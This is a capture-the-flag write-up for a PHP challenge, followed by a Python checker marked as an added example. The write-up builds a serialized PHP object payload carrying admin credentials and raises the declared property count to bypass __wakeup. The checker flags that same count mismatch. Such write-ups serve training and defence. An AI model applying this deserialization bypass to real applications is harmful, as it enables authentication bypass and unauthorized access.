[Geek Challenge 2019]PHP
Request www.zip to get the source code.
Three checks have to be bypassed.
Build the exploit:
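<?php
// Name class with its private properties set to the values we want
class Name {
    private $username = 'admin';
    private $password = '100';
}

$select = new Name();
// Private property names are serialized as \0Name\0<property>; the NUL bytes are written as %00 below
$res = serialize($select);
echo $res;
?>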
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
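Here we have to bypass this method:
function __wakeup(){
    $this->username = 'guest';
}
Key point:
__wakeup is bypassed only when the property count declared in the serialized string is larger than the actual number of properties.
So we change the 2 to 3: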
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
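The count mismatch described above is easy to spot on the defensive side. The following Python sketch is an added example, not part of the original post: it walks a URL-encoded PHP serialized string and reports every object whose declared property count differs from the number of properties actually present. The function names are hypothetical, and only the N, b, i, d, s, a and O type tags are handled.

```python
from urllib.parse import unquote_to_bytes

# The two payloads shown in this write-up (count 2, then count changed to 3).
PAGE_ORIGINAL = 'O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}'
PAGE_MODIFIED = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}'


def _scan(buf: bytes, i: int, findings: list) -> int:
    """Walk one serialized value starting at buf[i]; return the index just past it."""
    tag = buf[i:i + 1]
    if tag == b"N":                                   # N;
        return i + 2
    if tag in (b"i", b"b", b"d"):                     # i:1;  b:0;  d:0.5;
        return buf.index(b";", i) + 1
    if tag in (b"s", b"a", b"O"):
        colon = buf.index(b":", i + 2)
        n = int(buf[i + 2:colon])                     # string/class-name length or array count
        if tag == b"s":                               # s:<len>:"<bytes>";
            return colon + 2 + n + 2
        name = b""
        if tag == b"O":                               # O:<len>:"<class>":<count>:{
            name = buf[colon + 2:colon + 2 + n]
            start = colon + 2 + n + 2                 # first digit of <count>
            colon = buf.index(b":", start)
            n = int(buf[start:colon])                 # declared property count
        pos, actual = colon + 2, 0                    # first byte after '{'
        while buf[pos:pos + 1] != b"}":
            pos = _scan(buf, pos, findings)           # key or property name
            pos = _scan(buf, pos, findings)           # value (may be nested)
            actual += 1
        if tag == b"O" and n != actual:
            findings.append((name.decode(errors="replace"), n, actual))
        return pos + 1
    raise ValueError(f"unsupported or truncated data at offset {i}")


def count_mismatches(payload: str) -> list:
    """Return (class, declared, actual) for each object with a wrong property count."""
    findings = []
    _scan(unquote_to_bytes(payload), 0, findings)     # %00 becomes a real NUL byte
    return findings


if __name__ == "__main__":
    for label, p in (("original", PAGE_ORIGINAL), ("modified", PAGE_MODIFIED)):
        print(label, count_mismatches(p))
```

Malformed or truncated input raises ValueError, which a filter in front of unserialize() should treat as a reject.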
Original article: https://blog.csdn.net/alwtj/article/details/144097505